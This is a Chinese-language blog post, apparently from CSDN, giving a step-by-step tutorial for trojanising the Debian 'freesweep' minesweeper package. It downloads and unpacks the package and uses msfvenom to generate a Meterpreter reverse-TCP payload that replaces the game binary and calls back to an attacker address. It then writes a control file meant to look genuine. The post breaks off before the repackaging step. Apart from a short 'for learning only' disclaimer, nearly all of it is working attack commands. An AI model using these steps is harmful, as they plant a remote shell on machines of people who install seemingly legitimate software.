制作恶意 deb 软件包来触发后门

最新推荐文章于 2024-11-08 11:06:20 发布

Time_worm

最新推荐文章于 2024-11-08 11:06:20 发布

阅读量658

点赞数 15

文章标签：学习 linux 经验分享

本文链接：https://blog.csdn.net/Time_worm/article/details/140656939

版权

在此声明文章仅供相互学习参考，严禁利用于违法犯忌，任何事故自行承担！！

一、恶意deb软件包触发后门思路

----deb是linux的可执行软件

-----利用合法的deb软件里植入后门，后门程序把靶机上的shell返回给攻击者

二、软件包的配置

步骤：

1.freesweep软件包的下载解压并不安装

apt install freesweep --download-only

——制作恶意软件包使用--download-only 方式下载软件包不进行安装freesweep

mv /var/cache/apt/archives/freesweep_1.0.2-1_amd64.deb ~/

-----将软件包移动到 root 目录

dpkg -x freesweep_1.0.2-1_amd64.deb free

-------解压软件包到 free 目录，没有就会自动创建

安装：dpkg -i

解压：dpkg -x

2.msfvenom生成后门文件到软件包源文件

msfvenom -a x64 --platform linux -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.47.165 LPORT=4444 -b "\x00" -i 10 -f elf -o /root/free/usr/games/freesweep_sources

——----msfvenonom用于生成恶意代码到软件包源文件中

但此时，此时还不能够调用这个后门程序，因此还不能封包使用

拓展：生成软件包时无论是 payload 的和软件包信息都需要选择能够在目标操作系统上执行的。

mkdir free/DEBIAN && cd free/DEBIAN ——创建软件包信息目录

3.创建并编辑软件包的信息文件，安装后脚本文件添加执行权限来执行后门，构建新的 deb 安装包

vim /root/free/DEBIAN/control 或

tee /root/free/DEBIAN/control <<'EOF' ——创建并编辑软件包的信息文件

Package: freesweep

Version: 1.0.2-1

Section: Games and Amusement

Priority: optional

Architecture:amd64

Maintainer: Ubuntu MOTU Developers (ubuntu-motu@lists.ubuntu.com)

Description: a text-based minesweeper Freesweep is an implementation of the popular minesweeper game, where one tries to find all the mines without igniting any, based on hints given by the computer. Unlike most implementations of this game, Freesweep works in any visual text display - in Linux console, in an xterm, and in most text-based terminals currently in use.

EOF ---使用vim 可不要EOF命令

（软件包里一定要有包含Package、Version、Section、Priority、Architecture、Maintainer、Description，还有value可写可不写，里面的内容随意，但是尽量显得真实，注意点是每个开头首字母一定要大写，每个关键字之间不能间隔一行，否则封包时会提示错误）